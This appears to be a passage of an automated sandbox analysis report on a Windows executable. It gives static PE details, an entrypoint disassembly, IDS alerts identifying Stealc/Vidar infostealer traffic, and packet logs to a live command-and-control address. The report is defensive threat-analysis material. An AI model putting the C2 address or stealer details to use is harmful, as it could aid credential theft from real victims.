                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....Rq..O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                Chrome Cache Entry: 452

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5802)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5807
                                                                                                                                                                                                                                                                Entropy (8bit):5.808900662188082
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:USp6liWp/JK/33jEsvR0xXYFd66666COR1RP817+vZiyUIFPx5CH7Jx00WPffffy:xKPp/JK3zLWYFd66666C01l817+hiyUP
                                                                                                                                                                                                                                                                MD5:F93341F0D09BCE9B276EED1492676B42
                                                                                                                                                                                                                                                                SHA1:DEE3F39C35DE6A2E4A922D0FA5C242FB154E4573
                                                                                                                                                                                                                                                                SHA-256:79D4AB4F19A0DBC4768E72681FCD4803A602EABD145230973B547E36F78CE945
                                                                                                                                                                                                                                                                SHA-512:CC851154A92DFC0A8B903353BD86F8DD723D74F9722B05FB82EE0C92EBE50CD9D46A649B47E0BE1EC9F018738369908736796B662E5F234963DD8D7D161DC2A8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                Preview:)]}'.["",["soundhound ai stocks","dallas cowboys draft picks 2025","blue bloods series finale recap","tornado warning california scotts valley","marvel rivals tier","georgia bulldogs football","yellowstone season 5 season finale recap","rick steves"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wN2ticDUSDUZvb3RiYWxsIHRlYW0y9gpkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQXBDQU1BQUFDeVROOStBQUFBbjFCTVZFWC8vLzhzS2lrQUFBQVpGaFN0cmEwYkdCZjYrdnF2QUFDaW9xRXBKeWF6QUFBZ0hSd1dFeEVHQUFBbUl5SVJEUXZZa1pueTNkL2lzTFhKWG1zTEJRRHR6OUowYzNMUWVJS0doWVhibmFUUmZZYlpsNS9IVm1YV2g1REZUMTY2RHpDL3djRm9aMmZKeWNuNTcvQzJ0cmJXMXRibndNUlhWbFdUa3BMQk9rMjFBQXcwTWpIRFJWYS9MMFhNWm5MdDh2RkpSMGZlNHVLNEFDVzlKRHpPYjN1Vnp1ZmRBQUFESkVsRVFWUklpWlZXYlp1cUlCQ2RTQ1ZSRVRSTnN6SzF0QmMzdGUzLy83YUw3ck

                                                                                                                                                                                                                                                                Chrome Cache Entry: 453

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                Chrome Cache Entry: 454

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):132999
                                                                                                                                                                                                                                                                Entropy (8bit):5.435543893910781
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:flktv3zg+newH5FsYZGFsxIojLe13y2i6o:fAvn/H/MFsxIojY3y8o
                                                                                                                                                                                                                                                                MD5:C6448B24D32CF4F3DF38D5AAB120C703
                                                                                                                                                                                                                                                                SHA1:8F09722B17857C0595199E963052D2CF3D0C2FB6
                                                                                                                                                                                                                                                                SHA-256:16C3ABB5FDC6A15706ED3E0FCFF429B3128A54A0F236ED61A539EC166AC1984F
                                                                                                                                                                                                                                                                SHA-512:7AA3D6A031D0150E495AF7B0BCBC035EF1D46BDA87DE3DF3E82DABA48CBF61668EADC706D69FE9AAB7145BAF66B622337A429A02FC85B319C5BBB17EC3588EFA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):7.966288323697462
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                File name:nB52P46OJD.exe
                                                                                                                                                                                                                                                                File size:1'357'367 bytes
                                                                                                                                                                                                                                                                MD5:c6e90b3a98ecb4ab74a9aaf8155d1bc0
                                                                                                                                                                                                                                                                SHA1:0a29a790ab82dda61c5622586fbdbf46223b2989
                                                                                                                                                                                                                                                                SHA256:08bae1bb8a881ff6a6a25f988d73def21b6d65d262960bc4706534f479b85b62
                                                                                                                                                                                                                                                                SHA512:a0dcf48abd2df0b1d9afd33a49027047b53830f52bb0c16745fc953eaa9d38f15720496cbcf62eb17fcfa5a955ceadc16abfe8817350b6f528312e3429daa5aa
                                                                                                                                                                                                                                                                SSDEEP:24576:C3+N6VbU/lx01RMCHCeMyipDIwATowO1vgc9HQHfw9hSTVbB4:v6bUn0XM4M3DIH8wGPMIcbW
                                                                                                                                                                                                                                                                TLSH:C7553386FEF8C2F3C6A12A3087B6455496F5FA15252485066F34BC2D36E5E824F0ED3B
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                Icon Hash:c08ab2b2b2de7eb6

                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Entrypoint:0x4038af
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                                                Signature Issuer:CN=COMODO Code Signing CA 2, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                                                • 08/01/2013 19:00:00 09/01/2016 18:59:59
                                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                                • CN=Kirill Chermenin, O=Kirill Chermenin, STREET=70 Let Oktyabrya 17-50, L=Krasnodar, S=Krasnodarsky kray, PostalCode=350089, C=RU
                                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                                Thumbprint MD5:F4FE6AA0803BA4D986A0EFCC6CA0CA47
                                                                                                                                                                                                                                                                Thumbprint SHA-1:73F818C5F12C8C71136A5E6B45B29398888A48C2
                                                                                                                                                                                                                                                                Thumbprint SHA-256:A1E23231AEC7BFA0BFDDF468D8BE5DEA5463456EC1400E11B2039D01DAA4A1DE
                                                                                                                                                                                                                                                                Serial:00BADFCFEBF80484E1CF8E39A8B7F16D8A

                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                                                xor ebp, ebp
                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                call dword ptr [00409030h]
                                                                                                                                                                                                                                                                push 00008001h
                                                                                                                                                                                                                                                                call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                push 00000008h
                                                                                                                                                                                                                                                                mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                call 00007FE780B5B20Bh
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push 000002B4h
                                                                                                                                                                                                                                                                mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push 0040A264h
                                                                                                                                                                                                                                                                call dword ptr [00409184h]
                                                                                                                                                                                                                                                                push 0040A24Ch
                                                                                                                                                                                                                                                                push 00476AA0h
                                                                                                                                                                                                                                                                call 00007FE780B5AEEDh
                                                                                                                                                                                                                                                                call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                call 00007FE780B5AEDBh
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                call dword ptr [00409134h]
                                                                                                                                                                                                                                                                cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                mov eax, edi
                                                                                                                                                                                                                                                                jne 00007FE780B587DAh
                                                                                                                                                                                                                                                                push 00000022h
                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call 00007FE780B5ABB1h
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call dword ptr [00409260h]
                                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                jmp 00007FE780B58863h
                                                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                cmp ax, bx
                                                                                                                                                                                                                                                                jne 00007FE780B587DAh
                                                                                                                                                                                                                                                                add esi, 02h
                                                                                                                                                                                                                                                                cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x65f72.rsrc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x149db70x1880.rsrc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .rsrc0x1000000x65f720x660007de5b8fb42c8d5d71cd323b6a879fe5fFalse0.9839992149203431data7.900101331412788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .reloc0x1660000xfd60x1000d8e7871947653afbbd38c3e3cc603bb5False0.597900390625data5.597896970571839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                RT_ICON0x1002500x5a1e8PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902256127955614
                                                                                                                                                                                                                                                                RT_ICON0x15a4380x7ae4PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000508582326764
                                                                                                                                                                                                                                                                RT_ICON0x161f1c0x2527PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001156555567238
                                                                                                                                                                                                                                                                RT_ICON0x1644440x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6086065573770492
                                                                                                                                                                                                                                                                RT_ICON0x16556c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.74822695035461
                                                                                                                                                                                                                                                                RT_DIALOG0x1659d40x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                RT_DIALOG0x165ad40x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                RT_DIALOG0x165bf00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                RT_GROUP_ICON0x165c500x4cdataEnglishUnited States0.8157894736842105
                                                                                                                                                                                                                                                                RT_MANIFEST0x165c9c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                2024-12-16T13:46:47.571950+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.849715116.203.12.114443TCP
                                                                                                                                                                                                                                                                2024-12-16T13:46:49.869743+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.114443192.168.2.849716TCP
                                                                                                                                                                                                                                                                2024-12-16T13:46:52.157474+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.114443192.168.2.849718TCP

                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:50.509058952 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:52.118707895 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:00.166003942 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:02.868468046 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.137927055 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.137974977 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.138082027 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.163335085 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.163352013 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.533605099 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.533796072 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.601711035 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.601728916 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.602893114 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.604722977 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.608012915 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:39.651341915 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080158949 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080189943 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080230951 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080257893 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080333948 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.080457926 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.083586931 CET49712443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.083616018 CET44349712149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.403171062 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.403237104 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.403320074 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.403754950 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.403769970 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.235443115 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.235635042 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.240104914 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.240150928 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.240483046 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.240581989 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.240972996 CET49713443192.168.2.8116.203.12.114
